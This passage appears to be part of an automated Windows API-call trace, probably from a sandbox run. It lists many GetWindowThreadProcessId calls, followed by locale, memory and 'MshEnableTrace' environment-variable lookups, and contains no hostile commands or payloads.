	[0923.542] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x7dc
	[0923.543] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x768
	[0923.543] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x764
	[0923.543] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x820
	[0923.543] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x810
	[0923.543] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x794
	[0923.543] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x83c
	[0923.543] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x7ac
	[0923.543] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xb44
	[0923.544] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x6bc
	[0923.544] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xb5c
	[0923.544] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x838
	[0923.544] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0923.544] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0923.544] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0923.544] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0923.544] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0923.545] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0923.545] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0923.545] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0923.545] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x818
	[0923.545] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x5b8
	[0923.545] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x494
	[0923.545] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1ec
	[0923.545] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x440
	[0923.546] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x7e8
	[0923.546] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x730
	[0923.546] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x2c8
	[0923.546] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x31c
	[0923.546] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x330
	[0923.546] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x128
	[0923.546] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x5c8
	[0923.546] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x6f8
	[0923.547] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x358
	[0923.547] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x73c
	[0923.547] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xb0
	[0923.547] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x250
	[0923.547] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x240
	[0923.547] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x790
	[0923.547] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x61c
	[0923.547] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x540
	[0923.548] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x538
	[0923.548] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x568
	[0923.548] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x538
	[0923.548] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x568
	[0923.548] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x538
	[0923.548] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x540
	[0923.548] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x540
	[0923.548] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x57c
	[0923.549] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x460
	[0923.549] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x554
	[0923.549] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0923.549] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x528
	[0923.549] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0923.549] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0923.549] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0923.549] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x79c
	[0923.550] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0923.550] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4e0
	[0923.550] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0923.550] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x460
	[0923.550] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x460
	[0923.550] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x44c
	[0923.550] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x778
	[0923.551] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x460
	[0923.551] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x558
	[0923.551] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0923.551] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x4d0
	[0923.551] GetWindowThreadProcessId (in: hWnd=0x10bd8, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x25d8
	[0923.551] GetWindowThreadProcessId (in: hWnd=0x10bb8, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x2594
	[0923.551] GetWindowThreadProcessId (in: hWnd=0x10baa, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x2590
	[0923.551] GetWindowThreadProcessId (in: hWnd=0x10b76, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x2530
	[0923.551] GetWindowThreadProcessId (in: hWnd=0x10b68, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x251c
	[0923.552] GetWindowThreadProcessId (in: hWnd=0x10b64, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x2254
	[0923.552] GetWindowThreadProcessId (in: hWnd=0x10b60, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x2250
	[0923.552] GetWindowThreadProcessId (in: hWnd=0x10b54, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x16f0
	[0923.552] GetWindowThreadProcessId (in: hWnd=0x10b48, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1338
	[0923.552] GetWindowThreadProcessId (in: hWnd=0x10b3e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1ca0
	[0923.552] GetWindowThreadProcessId (in: hWnd=0x10b34, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x238c
	[0923.552] GetWindowThreadProcessId (in: hWnd=0x10b2a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1b08
	[0923.552] GetWindowThreadProcessId (in: hWnd=0x10b0e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1a8c
	[0923.553] GetWindowThreadProcessId (in: hWnd=0x10af8, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x18e0
	[0923.553] GetWindowThreadProcessId (in: hWnd=0x10aec, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x2344
	[0923.553] GetWindowThreadProcessId (in: hWnd=0x10ae0, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1d8c
	[0923.553] GetWindowThreadProcessId (in: hWnd=0x10ad4, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1038
	[0923.553] GetWindowThreadProcessId (in: hWnd=0x10ad0, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1a58
	[0923.553] GetWindowThreadProcessId (in: hWnd=0x10acc, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1c7c
	[0923.553] GetWindowThreadProcessId (in: hWnd=0x10ac6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1f04
	[0923.553] GetWindowThreadProcessId (in: hWnd=0x10ac2, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x18b8
	[0923.554] GetWindowThreadProcessId (in: hWnd=0x40278, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x22c8
	[0923.554] GetWindowThreadProcessId (in: hWnd=0x10abe, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x21b8
	[0923.554] GetWindowThreadProcessId (in: hWnd=0x20958, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x21c0
	[0923.554] GetWindowThreadProcessId (in: hWnd=0x10a7a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x219c
	[0923.554] GetWindowThreadProcessId (in: hWnd=0x10a6a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x20f4
	[0923.554] GetWindowThreadProcessId (in: hWnd=0x10a4c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x20e4
	[0923.554] GetWindowThreadProcessId (in: hWnd=0x10a40, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x20e8
	[0923.555] GetWindowThreadProcessId (in: hWnd=0x10a36, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x20ec
	[0923.555] GetWindowThreadProcessId (in: hWnd=0x20602, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x20f0
	[0923.555] GetWindowThreadProcessId (in: hWnd=0x10a2e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1e34
	[0923.555] GetWindowThreadProcessId (in: hWnd=0x10a28, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xc38
	[0923.555] GetWindowThreadProcessId (in: hWnd=0x10a20, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1fe4
	[0923.555] GetWindowThreadProcessId (in: hWnd=0x10a10, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1f10
	[0923.555] GetWindowThreadProcessId (in: hWnd=0x10a0c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1f0c
	[0923.555] GetWindowThreadProcessId (in: hWnd=0x10a08, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1f08
	[0923.556] GetWindowThreadProcessId (in: hWnd=0x109fc, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1ef0
	[0923.556] GetWindowThreadProcessId (in: hWnd=0x109ee, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1eec
	[0923.556] GetWindowThreadProcessId (in: hWnd=0x109e0, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1ee4
	[0923.556] GetWindowThreadProcessId (in: hWnd=0x109c6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1ed8
	[0923.556] GetWindowThreadProcessId (in: hWnd=0x109b6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1ed0
	[0923.556] GetWindowThreadProcessId (in: hWnd=0x1099c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1e8c
	[0923.556] GetWindowThreadProcessId (in: hWnd=0x1098e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1e88
	[0923.556] GetWindowThreadProcessId (in: hWnd=0x1097e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1e84
	[0923.557] GetWindowThreadProcessId (in: hWnd=0x20620, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1604
	[0923.557] GetWindowThreadProcessId (in: hWnd=0x1095a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1c2c
	[0923.557] GetWindowThreadProcessId (in: hWnd=0x10966, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1c08
	[0923.557] GetWindowThreadProcessId (in: hWnd=0x10964, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1c0c
	[0923.557] GetWindowThreadProcessId (in: hWnd=0x10962, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1c10
	[0923.557] GetWindowThreadProcessId (in: hWnd=0x1095e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1c14
	[0923.557] GetWindowThreadProcessId (in: hWnd=0x2043c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1c18
	[0923.557] GetWindowThreadProcessId (in: hWnd=0x206a6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1c1c
	[0923.558] GetWindowThreadProcessId (in: hWnd=0x4092e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x16fc
	[0923.558] GetWindowThreadProcessId (in: hWnd=0x30426, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1e78
	[0923.558] GetWindowThreadProcessId (in: hWnd=0x10956, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1c20
	[0923.558] GetWindowThreadProcessId (in: hWnd=0x503ea, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x191c
	[0923.558] GetWindowThreadProcessId (in: hWnd=0x108c6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1748
	[0923.558] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1bb4
	[0923.558] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x10bc
	[0923.558] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1b50
	[0923.559] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x14b4
	[0923.559] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x149c
	[0923.559] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x14a8
	[0923.559] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1490
	[0923.559] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x14a4
	[0923.559] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x148c
	[0923.559] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1458
	[0923.559] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1b4c
	[0923.560] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1b3c
	[0923.560] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x19bc
	[0923.560] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x199c
	[0923.560] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1998
	[0923.560] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1994
	[0923.560] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1990
	[0923.560] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1984
	[0923.560] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x197c
	[0923.560] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1978
	[0923.561] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1824
	[0923.561] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1088
	[0923.561] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1908
	[0923.561] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x18cc
	[0923.561] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x18d0
	[0923.561] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1840
	[0923.561] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x10c4
	[0923.561] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x128c
	[0923.562] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x16e8
	[0923.562] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x16cc
	[0923.562] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x274
	[0923.562] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x10e0
	[0923.562] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x10cc
	[0923.562] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x10c0
	[0923.562] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x10d0
	[0923.562] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1198
	[0923.563] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1080
	[0923.563] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1074
	[0923.563] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x106c
	[0923.563] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1474
	[0923.563] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1414
	[0923.563] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xbd0
	[0923.563] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x550
	[0923.563] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0xa38
	[0923.564] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x16d0
	[0923.564] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x16d4
	[0923.564] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x15bc
	[0923.564] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x15a0
	[0923.564] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x159c
	[0923.564] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1598
	[0923.564] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1594
	[0923.564] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1590
	[0923.565] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x158c
	[0923.565] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x1cdb00 | out: lpdwProcessId=0x1cdb00) returned 0x1588
	[0923.568] WerSetFlags () returned 0x0
	[0923.986] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0923.986] CoTaskMemFree (pv=0x0) 
	[0923.987] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1cde68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1cde60 | out: pulNumLanguages=0x1cde68, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1cde60) returned 1
	[0923.987] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1cde68, pwszLanguagesBuffer=0x2e5f718, pcchLanguagesBuffer=0x1cde60 | out: pulNumLanguages=0x1cde68, pwszLanguagesBuffer=0x2e5f718, pcchLanguagesBuffer=0x1cde60) returned 1
	[0923.993] CoTaskMemAlloc (cb=0x24) returned 0x37e2e0
	[0923.993] GetUserDefaultLocaleName (in: lpLocaleName=0x37e2e0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0923.993] CoTaskMemFree (pv=0x37e2e0) 
	[0924.044] CoTaskMemAlloc (cb=0x104) returned 0x376570
	[0924.045] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x376570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0924.047] CoTaskMemFree (pv=0x376570) 
	[0924.049] CoTaskMemAlloc (cb=0x104) returned 0x376570
	[0924.049] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x376570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0924.049] CoTaskMemFree (pv=0x376570) 
	[0924.050] CoTaskMemAlloc (cb=0x104) returned 0x376570
	[0924.050] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x376570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0924.051] CoTaskMemFree (pv=0x376570) 
